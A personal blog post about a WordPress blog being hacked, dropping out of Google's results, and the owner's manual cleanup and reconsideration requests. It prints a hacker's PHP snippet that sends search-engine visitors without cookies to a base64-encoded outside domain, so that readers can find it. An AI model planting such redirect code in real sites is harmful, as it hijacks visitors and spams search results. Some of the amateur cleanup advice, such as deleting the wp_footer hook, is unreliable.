I know, WP experts will advise me that it wasn’t magic but rather misbehavior of a dormant plugin or something else I did or misjudged. And I acknowledge that: remember, I blog for the pleasure of sharing ideas and news and am not a technical writer.

Ahem. That said, I am a pretty geeky chick, but sometimes these updates just seem like a magical mystery tour.

Yesterday I discovered I’d been largely de-indexed by Google (again) due to a hacker’s evil redirect. Now, this has happened before so I calmly investigated my code upon noticing a dramatic SERP drop. Spotting the offending base-64 code, I sliced it out and wrote a request for reconsideration to Google.

But then I faced the inevitable: I have to update WordPress again, if only for security purposes.

I used ftp to manually perform this update and immediately encountered a number of error messages. I sorted them out in short order and had most everything humming again within a couple of hours.

The only remaining big mess was the admin panel which wasn’t seeing its intended CSS and image files.

A colleague recommended reinstallation of the wp-admin files. This cleaned up the admin panel, but the visual editor was still inoperable. A reinstall of the wp-includes files seems to have been the answer. After trying for a number of hours to find the right fix, I’m lucky that these two simple tasks solved my issues. In looking for solutions, I found scads of good folks recommending things to try, with just as many people still looking at error codes after trying numerous fixes.

Over the next month other newts and toads will surely appear and I will wave my magic WordPress wand and say a few incantations, banishing all new forms of evil. Remember, 2.8 was just released, so those of us who jump in this soon are taking some risks.

This is a good learning opportunity for me when I’m working with my own site. But what if you are a web developer offering WP installs and customization for clients? Can one disclaim future issues, or must he or she assume responsibility for repairing any subsequent hacks or tricky updates?

There are far too many variables to make this a predictable and easy process: just check the various forums and other blogs where users document their experiences.

We all use different themes and plugins, which many of us customize endlessly, and our files surely contain some deprecated coding.

I remain a stalwart fan of WordPress but struggle to explain the nature of this beast when speaking with clients.

What do YOU do?

Though I use Google’s Webmaster Tools regularly (which is where one finds messages from Google about misbehaving sites), I never did hear from Google in writing about the issue. I just noticed that I was gone from the SERPs, practically overnight, and traffic was way down, which are classic symptoms of this latest round of hacks.

Presume that Google is way overloaded dealing with these issues, and they conveyed their, uh, concern for my site by removing me from the SERPs in the first place

If you think you may have been hacked, or if you haven’t and want to make sure you aren’t, here are some things to look out for:

Has your blog vanished from the search engine listings and your traffic fallen off tremendously?
I had some medical issues which kept me occupied and away from my blog for awhile. I naively concluded I just need to write more to build them back up. Don’t make that assumption. Start looking at Google’s cached version of your site and you may be in for an unpleasant surprise.

Patting yourself on the back for running the latest version of WordPress?
Even though you may be running the latest version of WP, you may have been infected prior to upgrading and not know it. I upgraded on May 29 to WP 2.5.1; I think I was hacked on 4/25, and those nasty files clung to my site files during the upgrade. You have to remove them manually.

Losing Focus.
In the midst of searching for and carving out compromised files, I read some discussions on Google’s definition of duplicate content. Probably not a good idea to start tackling other issues in the midst the hack abatement, but not thinking clearly, I sped off in that direction.

I revamped the way WordPress displays my page content to make certain I wasn’t violating that guideline, quickly building a new freestanding index page from instructions I found in the WordPress codex and at dailyblogtips.com (thanks to a tip from a fellow IVAA member, Laura Nieberding. Thanks, Laura!).

Right after putting the finishing touches on that and patting myself for taking measures NOT to display duplicate page content, I returned hack abatement.

The next tip I read about concerned base64 code and cookies that might be installed in the head area of infected WordPress theme files. I had already checked for those and, at THAT point, wasn’t affected.)

But wait a minute…

To build my new archives page, I had just grabbed two files from one of the default theme folders on my Theme folder, to create my new archives page, since my own theme didn’t include those files.

Hideously, I opened those files up and, the base 64 and cookies redirection malicious code was embedded at the top of the header code. Here’s the code you are looking for (thanks to bloggerguide.net):
< ?php \
$seref=array(�google�,�msn�,�live�,�altavista�,
�ask�,�yahoo�,�aol�,�cnn�,�weather�,�alexa�);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=�1?; break; }
if($ser==�1? && sizeof($_COOKIE)==0){ header(�Location: http://�.base64_decode(�YW55cmVzdWx0cy5uZXQ=�).�/�); exit;
}?>

In ignorance, I presumed that these default themes were installed (or installed over the top of previous versions) when I upgraded to 2.5.1. So, sliced that out, and continued down the list.

Be sure to notify Google of your efforts to remove offending code.
I wrote three separate “Request for Reconsideration” notes to Google, as I discovered more and made more inroads in digging out the offending code. Maybe overkill but I wanted to let them know I was working as hard as I could at eradicating that crap.

Report hidden code spam.
Google has a form you can use to report spammers, and those who employ hidden code, hidden links, and redirects. If someone embedded these in your site, find the embedded links and send thoseis a form you can fill out listing any offending web site that may have embedded code in your site, via a redirection. I sliced out an example of the hidden links, showing where they were redirecting to, in case that helped Google amass info on how these hacks are being accomplished.

I am not skilled in php, and am an average or below user of CSS. I do not want to be expert in hack abatement. Also, because I am a Mac user, I am largely inexperienced in dealing with hacks and viruses, etc.

What should others like me do about running blogs in view of the risk management and damage control that blogging seems to require now days???

Sigh. I love Google. I have had great luck over the years with DIY SEO and have always found Google’s resources to be extremely helpful.

Inexplicably, I seem to be in trouble with Google and have spent about 48 hours trying to figure out the issue, if there is one.

Sadly, I think it’s #$%@! hackers who are making a mockery of my attempt to run an informative blog. Nothing else to do but set other work aside and start looking for the evidence. From prior experience I know it will take me hours to find it.

Description of Problem:

This blog, Loosely Speaking, has suddenly disappeared from the search engine results pages where it once stood strong. If it is because of a violation of Google guidelines, I surmise that it was accomplished surreptitiously and I’ve been busy combing through my code, since I am pretty confident that I have not knowingly violated any of Google’s policies.

Here are the tactics I have tried, since I can’t find anything buried in my blog code:

1. Visited my account at Google Webmaster Tools to look for messages from Google, or indicators that there is something amiss with the site (didn’t find anything sketchy there to be concerned about).

2. Made sure my site map is up to date, just in case some of my more recent content wasn’t indexed yet.

3. Checked to see how many of my blog’s pages are indexed, and, yes, that’s looking good.

4. Wrote to Google to request reconsideration, explaining what I have done so far in trying to find what might be an issue resulting in my removal (though I hadn’t found anything). Wrote a followup request immediately after the first one. Wow, I am getting out of control!

5. Watched video at Webmaster Central Blog called “Requesting reconsideration using Google Webmaster Tools.” That had some helpful tips about looking (again) for hidden code.

6. Looking at Google’s cache view of my site, I see nothing initially, but when I click on “text view,” I have an AHA! moment. I see a whole bunch of embedded ringtone links at the bottom of the page. Are these the culprit? Or, are they a legitimate part of a Google Adsense ad that appears on my site? Could they be the reason I’ve been dropped from page listings?

Important to note: none of these links appear when I use “View Source” to look at my blog pages or when I use “View Source” to examine the php files within the blog. The links ONLY show up in Google’s cache view/text view.

7. Wrote ANOTHER request for reconsideration after FINALLY spotting those ringtone links.

8. Found a description of a do_action issue on Google’s Webmaster Tools Help discussion list:

“I found the problem and, yes, it was activated by requests containing “Google”, “Aol”, etc. The hack was embedded in the WordPress theme I had used, a theme called “[theme name removed]” (which is, ironically, otherwise a good theme). Anybody who is using [theme name removed] as a WordPress theme should look in footer.jsp, where a do_action call to “wp_footer” triggers the spam. I’m very glad to have finally solved this, and I pray Google will confirm that I have removed the violation and will restore me.”

So, I just removed that do_action tag, which appeared just above the body tag in my footer.php file. That may or may not be the right move: the tag looks like this, specifically: <?php do_action(‘wp_footer’); ?> That tag probably calls some other legitimat functions that I may want/need on my blog, and I may have now broken those. For the moment, I am just hoping that works to solve the problem.

9. Reading further, in the Google Webmaster Tools discussion, someone asked:

“Have you found the actual function that embeds the links by any chance? “

And the reply was:

“Yes, I have — it’s in “defaultFilters.php”. The function’s name is a long series of digits and characters. It’s an obvious hack, once you see it — the problem is that most people probably never read their “defaultFilters.php” module.”

10. I downloaded my own file named default-filters.php, and stare at it. I have no idea what an “obvious hack” looks like.

11. With energy flagging, I headed over to WordPress Codex to see if I could find any other tips. There’s a lot of good info there; I just couldn’t find anything further to try.

Dejectedly, I sum up the “situation:”

I believe I have found some hidden links that were embedded by a hacker, which resulted in punitive action by Google.

I have modified my footer.php file in hopes of no ill results across the blog and grabbed my default-filters.php file, but can’t tell by looking at it where the code is embedded, or if I have even removed it. I have done everything I can.

How terribly vulnerable & cheated I feel. About ready to throw in the towel on blogging at this point.

A couple hours later…

Feeling better after a nice homemade smoothie, and here are some links for those who want to read more about Google’s position on hacking:

The Day Google Erased me From the Internet

Helping Hacked Sites

Three Tips to Secure Your WordPress Installation

WordPress Exploit Giving Backlinks, Redirects and Headaches, but no Visitors

Did Your WordPress Site get Hacked?

Addendum, 7/1/08: After MORE reading (see last two above articles) and a chat with my host’s Tech Support, I went into my directory and looked for bogus image files, ending with .giff, jpgg, pngg, and containing a variant on an existing file name, with _old or _new appended. Also, found many image files with .php appended.

These files are in my uploads folder, and match, in name, legitimate image files that I uploaded, but that were hacked into different names. Delete all those files that you can find.